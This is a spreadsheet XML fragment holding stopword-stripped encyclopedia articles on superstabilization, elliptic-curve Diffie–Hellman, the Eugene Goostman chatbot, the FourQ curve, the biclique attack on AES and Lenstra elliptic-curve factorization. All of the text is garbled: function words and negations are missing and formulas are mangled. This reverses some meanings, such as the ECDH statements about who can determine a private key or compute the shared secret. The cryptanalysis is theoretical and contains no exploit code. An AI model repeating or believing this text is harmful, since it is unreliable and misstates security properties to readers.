    <t>superstabilization concept fault-tolerance distributed computing. superstabilizing distributed algorithms combine features self-stabilizing algorithms dynamic algorithms. superstabilizing algorithm like self-stabilizing algorithm started arbitrary state, eventually converge legitimate state. additionally, superstabilizing algorithm recover rapidly single change network topology (adding removing edge node network). self-stabilizing algorithm recovers change network topology system configuration topology change treated like arbitrary starting configuration. however, self-stabilizing algorithm, convergence single change network topology slow convergence arbitrary starting state. study superstabilizing algorithms, special attention paid time takes recover single change network topology. definitions stabilization time superstabilizing algorithm defined exactly case self-stabilizing algorithm: long takes converge legitimate state arbitrary configuration. depending computational model, time measured, e.g., synchronous communication rounds asynchronous cycles. superstabilization time time recover single topology change. assumed system initially legitimate configuration. then network topology changed; superstabilization time maximum time takes system reach legitimate configuration again. similarly, adjustment measure maximum number nodes change state changes. “almost-legitimate configurations” occur topology change formally modelled using passage predicates: passage predicate predicate holds single change network topology, also convergence legitimate configuration. references dolev, shlomi; herman, (1997), "superstabilizing protocols dynamic distributed systems", chicago journal theoretical computer science, article dolev, shlomi (2000), self-stabilization, press, isbn 0-262-04178-2, section 7.1.</t>
  </si>
  <si>
    <t>Elliptic-curve Diffie–Hellman</t>
  </si>
  <si>
    <t>elliptic-curve diffie–hellman (ecdh) agreement protocol allows parties, elliptic-curve public–private pair, establish shared secret insecure channel. this shared secret directly used key, derive another key. key, derived key, used encrypt subsequent communications using symmetric-key cipher. variant diffie–hellman protocol using elliptic-curve cryptography. establishment protocol following example illustrates shared established. suppose alice wants establish shared bob, channel available eavesdropped third party. initially, domain parameters (that {\displaystyle (p,a,b,g,n,h)} prime case {\displaystyle (m,f(x),a,b,g,n,h)} binary case) must agreed upon. also, party must pair suitable elliptic curve cryptography, consisting private {\displaystyle randomly selected integer interval {\displaystyle [1,n-1]} public represented point {\displaystyle (where {\displaystyle q=d\cdot result adding {\displaystyle {\displaystyle times). alice's pair {\displaystyle (d_{\text{a}},q_{\text{a}})} bob's pair {\displaystyle (d_{\text{b}},q_{\text{b}})} each party must know party's public prior execution protocol. alice computes point {\displaystyle (x_{k},y_{k})=d_{\text{a}}\cdot q_{\text{b}}} computes point {\displaystyle (x_{k},y_{k})=d_{\text{b}}\cdot q_{\text{a}}} shared secret {\displaystyle x_{k}} (the coordinate point). most standardized protocols based ecdh derive symmetric {\displaystyle x_{k}} using hash-based derivation function. shared secret calculated parties equal, {\displaystyle d_{\text{a}}\cdot q_{\text{b}}=d_{\text{a}}\cdot d_{\text{b}}\cdot g=d_{\text{b}}\cdot d_{\text{a}}\cdot g=d_{\text{b}}\cdot q_{\text{a}}} information alice initially exposes public key. party except alice determine alice's private (alice course knows selected it), unless party solve elliptic curve discrete logarithm problem. bob's private similarly secure. party alice compute shared secret, unless party solve elliptic curve diffie–hellman problem. public keys either static (and trusted, certificate) ephemeral (also known ecdhe, final stands "ephemeral"). ephemeral keys temporary necessarily authenticated, authentication desired, authenticity assurances must obtained means. authentication necessary avoid man-in-the-middle attacks. either alice's bob's public keys static, man-in-the-middle attacks thwarted. static public keys provide neither forward secrecy key-compromise impersonation resilience, among advanced security properties. holders static private keys validate public key, apply secure derivation function diffie–hellman shared secret avoid leaking information static private key. schemes security properties, mqv. alice maliciously chooses invalid curve points validate alice's points part selected group, collect enough residues bob's derive private key. several libraries found vulnerable attack.while shared secret used directly key, desirable hash secret remove weak bits diffie–hellman exchange. software curve25519 popular elliptic curve parameters reference implementation daniel bernstein bindings alternative implementations also available. line messenger used ecdh protocol "letter sealing" end-to-end encryption messages sent said since october 2015. signal protocol uses ecdh obtain post-compromise security. implementations protocol found signal, whatsapp, facebook messenger skype. also diffie–hellman exchange forward secrecy references</t>
  </si>
  <si>
    <t>Eugene Goostman</t>
  </si>
  <si>
    <t>eugene goostman chatbot regard passed turing test, test computer's ability communicate indistinguishably human. developed saint petersburg 2001 group three programmers, russian-born vladimir veselov, ukrainian-born eugene demchenko, russian-born sergey ulasen, goostman portrayed 13-year-old ukrainian boy—characteristics intended induce forgiveness interacts grammatical errors lack general knowledge. goostman competed number turing test contests since creation, finished second 2005 2008 loebner prize contest. june 2012, event marking would 100th birthday test's author, alan turing, goostman competition promoted largest-ever turing test contest, successfully convinced judges human. june 2014, contest marking 60th anniversary turing's death, event's judges thought goostman human; event's organiser kevin warwick considered passed turing's test result, turing's prediction 1950 paper computing machinery intelligence, year 2000, machines would capable fooling human judges five minutes questioning. validity relevance announcement goostman's pass questioned critics, noted exaggeration achievement warwick, bot's personality quirks humour attempt misdirect users non-human tendencies lack real intelligence, along "passes" achieved chatbots similar events. personality eugene goostman portrayed 13-year-old odessa, ukraine, guinea father gynaecologist. veselov stated goostman designed "character believable personality". choice intentional, veselov's opinion, thirteen-year-old "not know everything young know nothing". goostman's young also induces people "converse" forgive minor grammatical errors responses. 2014, work made improving bot's "dialog controller", allowing goostman output human-like dialogue.a conversation scott aaronson eugene goostman follows: competitions eugene goostman competed number turing test competitions, including loebner prize contest; finished joint second loebner test 2001, came second jabberwacky 2005 elbot 2008. june 2012, goostman turing test competition bletchley park milton keynes, held mark centenary namesake, alan turing. competition, featured five bots, twenty-five hidden humans, thirty judges, considered largest-ever turing test contest organizers. after series five-minute-long text conversations, judges convinced actual human. 2014 "pass" june 2014, turing test competition royal society, organised kevin warwick university reading mark 60th anniversary turing's death, goostman judges convinced human. judges took part event, included lord sharkey, sponsor turing's posthumous pardon, artificial intelligence professor aaron sloman, fellow royal society mark pagel dwarf actor robert llewellyn. each judge partook textual conversation five bots; time, also conversed human. all, total conversations conducted. warwick's view, made goostman first machine pass turing test. press release, added that: some claim test already passed. words turing test applied similar competitions around world. however event involved simultaneous comparison tests ever before, independently verified and, crucially, conversations unrestricted. true turing test questions topics prior conversations. 1950 paper "computing machinery intelligence", turing predicted year 2000, computer programs would sufficiently advanced average interrogator would, five minutes questioning, "not cent chance" correctly guessing whether speaking human machine. although turing phrased prediction rather "threshold intelligence", commentators believe warwick chosen interpret meaning interrogators fooled, software "passed turing test". reaction warwick's claim eugene goostman first ever chatbot pass turing test scepticism; critics acknowledged similar "passes" made past chatbots criteria, including therapist 1991 (which tricked judges, 50%), techniche festival 2011, modified version cleverbot tricked 59.3% 1334 votes (which included judges, along audience). cleverbot's developer, rollo carpenter, argued turing tests prove machine "imitate" intelligence rather show actual intelligence.gary marcus critical warwick's claims, arguing goostman's "success" result "cleverly-coded piece software", going "it's easy untrained judge might mistake reality, understanding sort system works, constant misdirection deflection becomes obvious, even irritating. illusion, words, fleeting." while acknowledging ibm's deep blue watson projects—single-purpose computer systems meant playing chess quiz show jeopardy! respectively—as examples computer systems show degree intelligence specialised field, argued equivalent computer system shows "broad" intelligence, could—for example, watch television programme answer questions content. marcus stated existing combination hardware software learn completely things clever child can." however, still believed potential uses technology goostman, specifically suggesting creation "believable", interactive video game characters.imperial college london professor murray shanahan questioned validity scientific basis test, stating "completely misplaced, devalues real research. makes seem like science fiction nearly here, fact incredibly difficult."mike masnick, editor blog techdirt, also skeptical, questioning publicity blunders five chatbots referred press releases "supercomputers", saying "creating chatbot fool humans really thing creating artificial intelligence." also natural language processing references external links eugene goostman webpage</t>
  </si>
  <si>
    <t>FourQ</t>
  </si>
  <si>
    <t>cryptography, fourq elliptic curve developed microsoft research. designed agreements schemes (elliptic-curve diffie–hellman) digital signatures (schnorr), offers bits security. equipped reference implementation made authors original paper. open source implementation called fourqlib runs windows linux available x86, x64, arm. licensed license source code available github.its name derived four dimensional gallant–lambert–vanstone scalar multiplication, allows high performance calculations. curve defined dimensional extension prime field defined mersenne prime {\displaystyle 2^{127}-1} history curve published 2015 craig costello patrick longa microsoft research eprint.the paper presented asiacrypt 2015 auckland, zealand, consequently reference implementation published microsoft's website.there efforts standardize usage curve ietf; efforts withdrawn late 2017. mathematical properties curve defined twisted edwards equation {\displaystyle -x^{2}+y^{2}=1+dx^{2}y^{2}} {\displaystyle non-square {\displaystyle \mathbb _{p^{2}}} {\displaystyle mersenne prime {\displaystyle 2^{127}-1} order avoid small subgroup attacks, points verified n-torsion subgroup elliptic curve, specified 246-bit prime dividing order group. curve equipped nontrivial endomorphisms: {\displaystyle \psi related {\displaystyle -power frobenius map, {\displaystyle \phi degree efficiently computable endomorphism (see complex multiplication). cryptographic properties security currently best known discrete logarithm attack generic pollard's algorithm, requiring 122.5 {\displaystyle 2^{122.5}} group operations average. therefore, typically belongs security level. order prevent timing attacks, group operations done constant time, i.e. without disclosing information material. efficiency most cryptographic primitives, notably ecdh, require fast computation scalar multiplication, i.e. {\displaystyle [k]p} point {\displaystyle curve integer {\displaystyle usually thought distributed uniformly random {\displaystyle \{0,\ldots ,n-1\}} since look prime order cyclic subgroup, write scalars {\displaystyle \lambda _{\psi },\lambda _{\phi {\displaystyle \psi (p)=[\lambda _{\psi }]p} {\displaystyle \phi (p)=[\lambda _{\phi }]p} every point {\displaystyle n-torsion subgroup. hence, given {\displaystyle write {\displaystyle k=a_{1}+a_{2}\lambda _{\phi }+a_{3}\lambda _{\psi }+a_{4}\lambda _{\phi }\lambda _{\psi }{\pmod {n}}} find small {\displaystyle a_{i}} compute {\displaystyle [k]p} quickly utilizing implied equation {\displaystyle [k]p=[a_{1}]p+[a_{2}]\phi (p)+[a_{3}]\psi (p)+[a_{4}]\phi (\psi (p))} babai rounding technique used find small {\displaystyle a_{i}} fourq turns guarantee efficiently computable solution {\displaystyle a_{i}&lt;2^{64}} moreover, characteristic field mersenne prime, modulations carried efficiently. both properties (four dimensional decomposition mersenne prime characteristic), alongside usage fast multiplication formulae (extended twisted edwards coordinates), make fourq currently fastest elliptic curve security level. uses fourq implemented cryptographic library circl, published cloudflare. also elliptic-curve cryptography curve25519 curve448 references external links reference implementation microsoft</t>
  </si>
  <si>
    <t>Biclique attack</t>
  </si>
  <si>
    <t>biclique attack variant meet-in-the-middle (mitm) method cryptanalysis. utilizes biclique structure extend number possibly attacked rounds mitm attack. since biclique cryptanalysis based mitm attacks, applicable block ciphers (iterated) hash-functions. biclique attacks known broken full full idea, though slight advantage brute force. also applied kasumi cipher preimage resistance skein-512 sha-2 hash functions.the biclique attack still april 2019) best publicly known single-key attack aes. computational complexity attack 126.1 {\displaystyle 2^{126.1}} 189.7 {\displaystyle 2^{189.7}} 254.4 {\displaystyle 2^{254.4}} aes128, aes192 aes256, respectively. publicly known single-key attack attacks full number rounds. previous attacks attacked round reduced variants (typically variants reduced rounds). computational complexity attack 126.1 {\displaystyle 2^{126.1}} theoretical attack, means security broken, remains relatively secure. biclique attack nevertheless interesting attack, suggests approach performing cryptanalysis block ciphers. attack also rendered information aes, brought question safety-margin number rounds used therein. history original mitm attack first suggested diffie hellman 1977, discussed cryptanalytic properties des. they argued key-size small, reapplying multiple times different keys could solution key-size; however, advised using double-des suggested triple-des minimum, mitm attacks (mitm attacks easily applied double-des reduce security {\displaystyle 2^{56*2}} {\displaystyle 2*2^{56}} since independently bruteforce first second des-encryption plain- ciphertext). since diffie hellman suggested mitm attacks, many variations emerged useful situations, basic mitm attack inapplicable. biclique attack variant first suggested dmitry khovratovich, rechberger savelieva hash-function cryptanalysis. however, bogdanov, khovratovich rechberger showed apply concept bicliques secret-key setting including block-cipher cryptanalysis, published attack aes. prior this, mitm attacks many block ciphers received little attention, mostly need independent bits 'mitm subciphers' order facilitate mitm attack something hard achieve many modern schedules, aes. biclique general explanation biclique structure article bicliques. mitm attack, keybits {\displaystyle k_{1}} {\displaystyle k_{2}} belonging first second subcipher, need independent; need independent other, else matched intermediate values plain- ciphertext cannot computed independently mitm attack (there variants mitm attacks, blocks shared key-bits. 3-subset mitm attack). this property often hard exploit larger number rounds, diffusion attacked cipher. simply put: rounds attack, larger subciphers have. larger subciphers have, fewer independent key-bits subciphers bruteforce independently. course, actual number independent key-bits subcipher depends diffusion properties key-schedule. biclique helps tackling above, allows instance, attack rounds using mitm attacks, utilizing biclique structure length (i.e. covers rounds cipher), intermediate state start round last round, e.g. aes128), thus attacking full number rounds cipher, even possible attack amount rounds basic mitm attack. meaning biclique thus build structure effectively, intermediate value mitm attack ciphertext end. which ciphertext intermediate state gets mapped end, course depends used encryption. used state ciphertext biclique, based keybits bruteforced first second subcipher mitm attack. essence biclique attacks thus, besides mitm attack, able build biclique structure effectively, depending keybits {\displaystyle k_{1}} {\displaystyle k_{2}} certain intermediate state corresponding ciphertext. build biclique bruteforce {\displaystyle 2^{d}} intermediate states {\displaystyle 2^{d}} ciphertexts, compute keys maps them. this requires {\displaystyle 2^{2d}} key-recoveries, since intermediate state needs linked ciphertexts. independent related-key differentials (this method suggested bogdanov, khovratovich rechberger paper: biclique cryptanalysis full aes) preliminary: remember function biclique intermediate values, {\displaystyle ciphertext-values, {\displaystyle based {\displaystyle k[i,j]} that: {\displaystyle \forall i,j:s_{j}{\xrightarrow[{f}]{k[i,j]}}c_{i}} procedure: step one: intermediate state( {\displaystyle s_{0}} ciphertext( {\displaystyle c_{0}} key( {\displaystyle k[0,0]} chosen that: {\displaystyle s_{0}{\xrightarrow[{f}]{k[0,0]}}c_{o}} {\displaystyle function maps intermediate state ciphertext using given key. this denoted base computation. step two: sets related keys size {\displaystyle 2^{d}} chosen. keys chosen that: first keys keys, fulfills following differential-requirements {\displaystyle respect base computation: {\displaystyle 0{\xrightarrow[{f}]{\delta _{i}^{k}}}\delta _{i}} second keys keys, fulfills following differential-requirements {\displaystyle respect base computation: {\displaystyle \nabla _{j}{\xrightarrow[{f}]{\nabla _{j}^{k}}}0} keys chosen trails {\displaystyle \delta _{i}} {\displaystyle \nabla _{j}} -differentials independent i.e. share active non-linear components.in words: input difference output difference {\displaystyle \delta _{i}} difference {\displaystyle \delta _{i}^{k}} differences respect base computation. input difference {\displaystyle \nabla _{j}} output difference difference {\displaystyle \nabla _{j}^{k}} differences respect base computation. step three: since trails share non-linear components (such s-boxes), trails combined get: {\displaystyle 0{\xrightarrow[{f}]{\delta _{i}^{k}}}\delta _{i}\oplus \nabla _{j}{\xrightarrow[{f}]{\nabla _{j}^{k}}}0=\nabla _{j}{\xrightarrow[{f}]{\delta _{i}^{k}\oplus \nabla _{j}^{k}}}\delta _{i}} conforms definitions differentials step trivial tuple {\displaystyle (s_{0},c_{0},k[0,0])} base computation, also conforms definition differentials, differentials respect base computation. substituting {\displaystyle s_{0},c_{0}} {\displaystyle k[0,0]} definitions, yield {\displaystyle 0{\xrightarrow[{f}]{0}}0} since {\displaystyle \delta _{0}=0,\nabla _{0}=0} {\displaystyle \delta _{0}^{k}=0} this means tuple base computation, also xor'ed combined trails: {\displaystyle s_{0}\oplus \nabla _{j}{\xrightarrow[{f}]{k[0,0]\oplus \delta _{i}^{k}\oplus \nabla _{j}^{k}}}c_{0}\oplus \delta _{i}} step four: trivial that: {\displaystyle s_{j}=s_{0}\oplus \nabla _{j}} {\displaystyle k[i,j]=k[0,0]\oplus \delta _{i}^{k}\oplus \nabla _{j}^{k}} {\displaystyle c_{i}=c_{0}\oplus \delta _{i}} substituted combined differential trails, result {\displaystyle s_{j}{\xrightarrow[{f}]{k[i,j]}}c_{i}} which definition, earlier biclique: {\displaystyle \forall i,j:s_{j}{\xrightarrow[{f}]{k[i,j]}}c_{i}} thus possible create biclique size {\displaystyle 2^{2d}} {\displaystyle 2^{2d}} since {\displaystyle 2^{d}} keys first keys, combined {\displaystyle 2^{d}} keys second keys). this means biclique size {\displaystyle 2^{2d}} created using {\displaystyle 2*2^{d}} computations differentials {\displaystyle \delta _{i}} {\displaystyle \nabla _{j}} {\displaystyle {\displaystyle \delta _{i}\neq \nabla _{j}} {\displaystyle i+j&gt;0} keys {\displaystyle k[i,j]} also different biclique. this biclique constructed leading biclique attack aes. there practical limitations constructing bicliques technique. longer biclique rounds differential trails cover. diffusion properties cipher, thus plays crucial role effectiveness constructing biclique. other ways constructing biclique bogdanov, khovratovich rechberger also describe another construct biclique, called 'interleaving related-key differential trails' article: "biclique cryptanalysis full aes". biclique cryptanalysis procedure step one: attacker groups possible keys key-subsets size {\displaystyle 2^{2d}} {\displaystyle group indexed {\displaystyle k[i,j]} matrix size {\displaystyle 2^{d}\times 2^{d}} attacker splits cipher sub-ciphers, {\displaystyle {\displaystyle (such {\displaystyle e=f\circ normal mitm attack. keys sub-ciphers cardinality {\displaystyle 2^{d}} called {\displaystyle k[i,0]} {\displaystyle k[0,j]} combined sub-ciphers expressed aforementioned matrix {\displaystyle k[i,j]} step two: attacker builds biclique group {\displaystyle 2^{2d}} keys. biclique dimension-d, since maps {\displaystyle 2^{d}} internal states, {\displaystyle s_{j}} {\displaystyle 2^{d}} ciphertexts, {\displaystyle c_{i}} using {\displaystyle 2^{2d}} keys. section "how build biclique" suggests build biclique using "independent related-key differentials". biclique case built using differentials keys, {\displaystyle k[i,0]} {\displaystyle k[0,j]} belonging sub-ciphers. step three: attacker takes {\displaystyle 2^{d}} possible ciphertexts, {\displaystyle c_{i}} asks decryption-oracle provide matching plaintexts, {\displaystyle p_{i}} step four: attacker chooses internal state, {\displaystyle s_{j}} corresponding plaintext, {\displaystyle p_{i}} performs usual mitm attack {\displaystyle {\displaystyle attacking internal state plaintext. step five: whenever key-candidate found matches {\displaystyle s_{j}} {\displaystyle p_{i}} tested another plain-/ciphertext pair. validates pair, highly likely correct key. example attack following example based biclique attack paper "biclique cryptanalysis full aes". descriptions example uses terminology authors attack used (i.e. variable names, etc). simplicity attack aes128 variant covered below. attack consists 7-round mitm attack biclique covering last rounds. partitioning key-space partitioned {\displaystyle 2^{112}} groups keys, group consist {\displaystyle 2^{16}} keys. {\displaystyle 2^{112}} groups, unique base-key {\displaystyle k[0,0]} base-computation selected. base-key specific bytes zero, shown table (which represents matrix aes128): {\displaystyle {\begin{bmatrix}-&amp;-&amp;-&amp;0\\0&amp;-&amp;-&amp;-\\-&amp;-&amp;-&amp;-\\-&amp;-&amp;-&amp;-\end{bmatrix}}} remaining bytes (112 bits) enumerated. this yields {\displaystyle 2^{112}} unique base-keys; group keys. ordinary {\displaystyle 2^{16}} keys group chosen respect base-key. they chosen nearly identical base-key. they vary bytes (either {\displaystyle {\displaystyle shown bytes: {\displaystyle {\begin{bmatrix}-&amp;-&amp;i&amp;i\\j&amp;-&amp;j&amp;-\\-&amp;-&amp;-&amp;-\\-&amp;-&amp;-&amp;-\end{bmatrix}}} this gives {\displaystyle 2^{8}k[i,0]} {\displaystyle 2^{8}k[0,j]} combined gives {\displaystyle 2^{16}} different keys, {\displaystyle k[i,j]} {\displaystyle 2^{16}} keys constitute keys group respective base key. biclique construction {\displaystyle 2^{112}} bicliques constructed using "independent related-key differentials" technique, described "how construct biclique" section. requirement using technique, forward- backward-differential trails need combined, share active non-linear elements. known case? keys step chosen relation base key, differential trails {\displaystyle \delta _{i}} using keys {\displaystyle k[i,0]} never share active s-boxes (which non-linear component aes), differential trails {\displaystyle \nabla _{j}} using {\displaystyle k[0,j]} therefore possible differential trails create biclique. mitm attack when bicliques created, mitm attack almost begin. before mitm attack, {\displaystyle 2^{d}} intermediate values plaintext: {\displaystyle p_{i}{\xrightarrow[{}]{k[i,0]}}{\xrightarrow[{v_{i}}]{}}} {\displaystyle 2^{d}} intermediate values ciphertext: {\displaystyle {\xleftarrow[{v_{j}}]{}}{\xleftarrow[{}]{k[0,j]}}s_{j}} corresponding intermediate states sub-keys {\displaystyle k[i,0]} {\displaystyle k[0,j]} precomputed stored, however. mitm attack carried out. order test {\displaystyle k[i,j]} necessary recalculate parts cipher, known vary {\displaystyle p_{i}{\xrightarrow[{}]{k[i,0]}}{\xrightarrow[{v_{i}}]{}}} {\displaystyle p_{i}{\xrightarrow[{}]{k[i,j]}}{\xrightarrow[{v_{i}}]{}}} backward computation {\displaystyle s_{j}} {\displaystyle {\xleftarrow[{v_{j}}]{}}} s-boxes needs recomputed. forwards computation {\displaystyle p_{i}} {\displaystyle {\xrightarrow[{v_{i}}]{}}} in-depth explanation amount needed recalculation found "biclique cryptanalysis full aes" paper, example taken from). when intermediate values match, key-candidate {\displaystyle k[i,j]} {\displaystyle p_{i}} {\displaystyle s_{j}} found. key-candidate tested another plain-/ciphertext pair. results this attack lowers computational complexity aes128 126.18 {\displaystyle 2^{126.18}} times faster bruteforce approach. data complexity attack {\displaystyle 2^{88}} memory complexity {\displaystyle 2^{8}} references</t>
  </si>
  <si>
    <t>Lenstra elliptic-curve factorization</t>
  </si>
  <si>
    <t>lenstra elliptic-curve factorization elliptic-curve factorization method (ecm) fast, sub-exponential running time, algorithm integer factorization, employs elliptic curves. general-purpose factoring, third-fastest known factoring method. second-fastest multiple polynomial quadratic sieve, fastest general number field sieve. lenstra elliptic-curve factorization named hendrik lenstra. practically speaking, considered special-purpose factoring algorithm, suitable finding small factors. currently, still best algorithm divisors exceeding digits, running time dominated size smallest factor rather size number factored. frequently, used remove small factors large integer many factors; remaining integer still composite, large factors factored using general-purpose techniques. largest factor found using decimal digits discovered september 2013 propper. increasing number curves tested improves chances finding factor, linear increase number digits. algorithm lenstra elliptic-curve factorization method find factor given natural number {\displaystyle works follows: pick random elliptic curve {\displaystyle \mathbb /n\mathbb equation form {\displaystyle y^{2}=x^{3}+ax+b{\pmod {n}}} together non-trivial point {\displaystyle p(x_{0},y_{0})} this done first picking random {\displaystyle x_{0},y_{0},a\in \mathbb /n\mathbb setting {\displaystyle b=y_{0}^{2}-x_{0}^{3}-ax_{0}{\pmod {n}}} assure point curve. define addition points curve, define group. addition laws given article elliptic curves. form repeated multiples point {\displaystyle times) {\displaystyle [k]p=p+\ldots +p{\text{ times)}}} addition formulae involve taking modular slope chord joining {\displaystyle {\displaystyle thus division residue classes modulo {\displaystyle performed using extended euclidean algorithm. particular, division {\displaystyle v{\bmod {n}}} includes calculation {\displaystyle \gcd(v,n)} assuming calculate slope form {\displaystyle u/v} {\displaystyle \gcd(u,v)=1} {\displaystyle v=0{\bmod {n}}} result point addition {\displaystyle \infty point infinity" corresponding intersection "vertical" line joining {\displaystyle p(x,y),p'(x,-y)} curve. however, {\displaystyle \gcd(v,n)\neq 1,n} point addition produce meaningful point curve; but, importantly, {\displaystyle \gcd(v,n)} non-trivial factor {\displaystyle compute {\displaystyle [k]p} elliptic curve {\displaystyle {\bmod {n}}} {\displaystyle product many small numbers: say, product small primes raised small powers, algorithm, factorial {\displaystyle large {\displaystyle this done efficiently, small factor time. say, {\displaystyle [b!]p} first compute {\displaystyle [2]p} {\displaystyle [3]([2]p)} {\displaystyle [4]([3!]p)} {\displaystyle picked small enough {\displaystyle -wise point addition performed reasonable time. finish calculations without encountering non-invertible elements {\displaystyle {\bmod {n}}} means elliptic curves' (modulo primes) order smooth enough, need different curve starting point. encounter {\displaystyle \gcd(v,n)\neq 1,m} done: non-trivial factor {\displaystyle .the time complexity depends size number's smallest prime factor represented exp[(√2 o(1)) smallest factor {\displaystyle l_{p}\left[{\frac {1}{2}},{\sqrt {2}}\right]} l-notation. algorithm work? prime divisors (mod implies equation also modulo modulo these smaller elliptic curves {\displaystyle \boxplus -addition genuine groups. groups elements, respectively, point original curve, lagrange's theorem, minimal {\displaystyle kp=\infty curve modulo implies divides moreover, {\displaystyle n_{p}p=\infty analogous statement holds curve modulo when elliptic curve chosen randomly, random numbers close respectively (see below). hence unlikely prime factors same, quite likely computing encounter modulo modulo vice versa. when case, exist original curve, computations found either gcd(v,p) gcd(v, both. that gcd(v, gave non-trivial factor core improvement older algorithm. algorithm finds prime factors b-powersmooth small values multiple relatively prime fermat's little theorem (mod then gcd(ae likely produce factor however, algorithm fails large prime factors, case numbers containing strong primes, example. gets around obstacle considering group random elliptic curve finite field rather considering multiplicative group always order order group elliptic curve varies (quite randomly) hasse's theorem, likely smooth elliptic curves. although proof smooth group order found hasse-interval, using heuristic probabilistic methods, canfield–erdős–pomerance theorem suitably optimized parameter choices, l-notation, expect l[√2/2, curves getting smooth group order. this heuristic estimate reliable practice. example following example trappe washington (2006), details added. want factor 455839. let's choose elliptic curve point let's compute (10!)p. slope tangent line point a=(x, (3x2 5)/(2y) (mod using compute value form gcd(a,b) find modular inverse exist, gcd(n,b) non-trivial factor first compute s(p) s(1,1) coordinates (x′, –53, numbers understood (mod just check indeed curve: (–53)2 2809 5·14 then compute 3(2p). s(2p) s(14,-53) –593/106 (mod using euclidean algorithm: 455839 4300·106 2·39 2·11 hence gcd(455839, 106) working backwards version extended euclidean algorithm): 2·28 5·11 7·28 5·39 7·106 19·39 81707·106 19·455839. hence 106−1 81707 (mod 455839), –593/106 –133317 (mod 455839). given compute coordinates 2(2p), above: (259851, 116255). just check indeed point curve: 54514 (mod 455839). after this, compute {\displaystyle 3(2p)=4p\boxplus similarly compute 4!p, requires inverting (mod 455839). euclidean algorithm gives 455839 divisible 599, found factorization 455839 599·761. reason worked curve (mod 599) 27·5 points, (mod 761) 3·7·37 points. moreover, smallest positive integers curve (mod 599) (mod 761), respectively. since multiple multiple 777, curve (mod 599), curve (mod 761), hence repeated addition broke here, yielding factorization. algorithm projective coordinates before considering projective plane {\displaystyle (\mathbb /n\mathbb )/\sim first consider 'normal' projective space instead points, lines origin studied. line represented non-zero point {\displaystyle (x,y,z)} equivalence relation given {\displaystyle (x,y,z)\sim (x',y',z')} under equivalence relation, space called projective plane {\displaystyle \mathbb ^{2}} points, denoted {\displaystyle (x:y:z)} correspond lines three-dimensional space pass origin. note point {\displaystyle (0:0:0)} exist space since draw line possible direction requires least x',y' observe almost lines given reference plane (x,y,1)-plane, whilst lines precisely parallel plane, coordinates (x,y,0), specify directions uniquely, 'points infinity' used affine (x,y)-plane lies above. algorithm, group structure elliptic curve field used. since necessarily need field finite field also provide group structure elliptic curve. however, considering curve operation {\displaystyle (\mathbb /n\mathbb )/\sim prime give group. elliptic curve method makes failure cases addition law. state algorithm projective coordinates. neutral element given point infinity {\displaystyle (0:1:0)} (positive) integer consider elliptic curve points structure {\displaystyle e(\mathbb /n\mathbb )=\{(x:y:z)\in \mathbb ^{2}\ y^{2}z=x^{3}+axz^{2}+bz^{3}\}} pick {\displaystyle x_{p},y_{p},a\in \mathbb /n\mathbb calculate {\displaystyle b=y_{p}^{2}-x_{p}^{3}-ax_{p}} elliptic curve weierstrass form given {\displaystyle y^{2}=x^{3}+ax+b} using projective coordinates elliptic curve given homogeneous equation {\displaystyle zy^{2}=x^{3}+az^{2}x+bz^{3}} point {\displaystyle p=(x_{p}:y_{p}:1)} choose upperbound {\displaystyle b\in \mathbb elliptic curve. remark: find factors group order elliptic curve {\displaystyle \mathbb /p\mathbb (denoted {\displaystyle \#e(\mathbb /p\mathbb b-smooth, means prime factors {\displaystyle \#e(\mathbb /p\mathbb less equal calculate {\displaystyle k={\rm {lcm}}(1,\dots ,b)} calculate {\displaystyle kp:=p+p+\cdots times) ring {\displaystyle e(\mathbb /n\mathbb note {\displaystyle \#e(\mathbb /n\mathbb b-smooth prime (and therefore {\displaystyle \mathbb /n\mathbb field) {\displaystyle kp=(0:1:0)} however, {\displaystyle \#e(\mathbb /p\mathbb b-smooth divisor product might (0:1:0) addition multiplication well-defined prime. case, non-trivial divisor found. not, back step occur, notice simplifying product {\displaystyle kp.} point said right circumstances non-trivial divisor found. pointed lenstra's article (factoring integers elliptic curves) addition needs assumption {\displaystyle \gcd(x_{1}-x_{2},n)=1} {\displaystyle p,q} {\displaystyle (0:1:0)} distinct (otherwise addition works similarly, little different), addition works follows: calculate: {\displaystyle r=p+q;} {\displaystyle p=(x_{1}:y_{1}:1),q=(x_{2}:y_{2}:1)} {\displaystyle \lambda =(y_{1}-y_{2})(x_{1}-x_{2})^{-1}} {\displaystyle x_{3}=\lambda ^{2}-x_{1}-x_{2}} {\displaystyle y_{3}=\lambda (x_{1}-x_{3})-y_{1}} {\displaystyle r=p+q=(x_{3}:y_{3}:1)} addition fails, failure calculating {\displaystyle \lambda particular, {\displaystyle (x_{1}-x_{2})^{-1}} always calculated prime (and therefore {\displaystyle \mathbb /n\mathbb field). without making {\displaystyle \mathbb /n\mathbb field, could calculate: {\displaystyle \lambda '=y_{1}-y_{2}} {\displaystyle x_{3}'={\lambda '}^{2}-x_{1}(x_{1}-x_{2})^{2}-x_{2}(x_{1}-x_{2})^{2}} {\displaystyle y_{3}'=\lambda '(x_{1}(x_{1}-x_{2})^{2}-x_{3}')-y_{1}(x_{1}-x_{2})^{3}} {\displaystyle r=p+q=(x_{3}'(x_{1}-x_{2}):y_{3}':(x_{1}-x_{2})^{3})} simplify possible.this calculation always legal z-coordinate simplifying fails, non-trivial divisor found. twisted edwards curves edwards curves needs fewer modular multiplications less time montgomery curves weierstrass curves (other used methods). using edwards curves also find primes. definition. {\displaystyle field {\displaystyle 2\neq {\displaystyle a,d\in k\setminus \{0\}} {\displaystyle a\neq then twisted edwards curve {\displaystyle e_{e,a,d}} given {\displaystyle ax^{2}+y^{2}=1+dx^{2}y^{2}.} edwards curve twisted edwards curve {\displaystyle a=1} there five known ways build points edwards curve: affine points, projective points, inverted points, extended points completed points. affine points given {\displaystyle \{(x,y)\in \mathbb ^{2}:ax^{2}+y^{2}=1+dx^{2}y^{2}\}} .the addition given {\displaystyle (e,f),(g,h)\mapsto \left({\frac {eh+fg}{1+degfh}},{\frac {fh-aeg}{1-degfh}}\right).} point (0,1) neutral element inverse {\displaystyle (e,f)} {\displaystyle (-e,f)} representations defined similar projective weierstrass curve follows affine. elliptic curve edwards form point order torsion group edwards curve {\displaystyle \mathbb isomorphic either {\displaystyle \mathbb /4\mathbb ,\mathbb /8\mathbb ,\mathbb /12\mathbb ,\mathbb /2\mathbb \times \mathbb /4\mathbb {\displaystyle \mathbb /2\mathbb \times \mathbb /8\mathbb interesting cases {\displaystyle \mathbb /12\mathbb {\displaystyle \mathbb /2\mathbb \times \mathbb /8\mathbb since force group orders curve modulo primes divisible respectively. following curves torsion group isomorphic {\displaystyle \mathbb /12\mathbb 